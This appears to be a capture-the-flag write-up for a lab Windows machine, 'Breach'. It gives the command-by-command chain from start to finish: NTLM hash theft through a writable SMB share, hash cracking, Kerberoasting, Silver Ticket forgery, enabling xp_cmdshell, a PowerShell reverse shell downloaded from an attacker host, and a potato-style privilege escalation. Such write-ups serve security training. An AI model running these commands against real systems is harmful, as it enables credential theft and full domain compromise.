Skip to main content

Machine (Medium) - Breach

Writeup Author: bobbuilder

Overview

Category: Machine

Difficulty: Medium

Machine Author: xct

Domain: breach.vl

Machine: Windows

Objective: This machine (breach.vl) exposed writable SMB shares and weak NTLMv2 authentication, leading to credential theft, lateral movement via MSSQL, and eventual privilege escalation using a Silver Ticket attack leveraging SeImpersonatePrivilege.

Enumeration

SMB Shares (Unauthenticated)

nxc smb <breach_ip> -u 'guest' -p '' --shares
  • Found share with READ,WRITE access.

Uploading Files to Writable Share

for file in ~/tools/ntlm_theft/nt/*; do
    filename=$(basename "$file")
    nxc smb <breach_ip> -u 'guest' -p '' --share share --put-file "$file" "\\transfer\\$filename"
done

Alternative using smbclient:

for file in $(ls ~/tools/ntlm_theft/nt/); do
    smbclient -c "cd transfer; put $file" \\\\<breach_ip>\\share -N
done

Initial Access

Capture NTLMv2 Hash (Responder)

sudo responder -I tun0
  • Captured: Julia.Wong::BREACH:...

Crack Hash

hashcat.exe -m 13100 hashes.txt uniq.lst
  • Recovered credentials: julia.wong:<REDACTED>

Post-Exploitation

Kerberoasting

impacket-GetUserSPNs -target-domain breach.vl -usersfile users.txt -dc-ip <dc_ip> breach.vl/guest -no-pass
  • Extracted SPN hash for svc_mssql.

Crack SPN Hash

hashcat.exe -m 13100 hashes.txt uniq.lst
  • Found credentials: svc_mssql:<REDACTED>

MSSQL Access

impacket-mssqlclient breach/svc_mssql:<REDACTED>@breach.vl -windows-auth

Enable Directory Listing via xp_dirtree

EXEC xp_dirtree 'C:\';

BloodHound Enumeration

bloodhound-python -c all -u "svc_mssql" -p "<REDACTED>" -d breach.vl -ns <dc_ip>

Privilege Escalation - Silver Ticket

Dump PAC Info (Identify Domain SID)

impacket-getPac -targetUser administrator breach.vl/julia.wong:<REDACTED>

Derive NTLM Hash from Password

iconv -f ASCII -t UTF-16LE <(printf "Trustno1") | openssl dgst -md4 -provider legacy -md4
  • Output: <svc_mssql_ntlm_hash>

Extract SPN from BloodHound

MSSQLSvc/breachdc.breach.vl

Craft Silver Ticket

impacket-ticketer -nthash <svc_mssql_ntlm_hash> -domain-sid <domain_sid> -domain breach.vl -spn MSSQLSvc/breachdc.breach.vl Administrator

export KRB5CCNAME=./Administrator.ccache

Authenticate via Silver Ticket

impacket-mssqlclient breachdc.breach.vl -k -no-pass

Enable command execution:

EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';

Execute Reverse Shell (PowerShell)

xp_cmdshell powershell -c "curl http://<attacker_ip>/tiny_revtcp.ps1 -o C:\Users\Public\Downloads\tcp.ps1"
xp_cmdshell powershell -ExecutionPolicy Bypass -c "cd C:\Users\Public\Downloads;.\tcp.ps1"

Privilege Escalation - SeImpersonatePrivilege

Confirm Token Privileges

whoami /all
  • Confirmed SeImpersonatePrivilege is enabled.

Exploit via Juicy Potato-like Tool

curl http://<attacker_ip>/god4.exe -O god.exe
.\god.exe -cmd "cmd /c more C:\Users\Administrator\Desktop\root.txt"
Back to top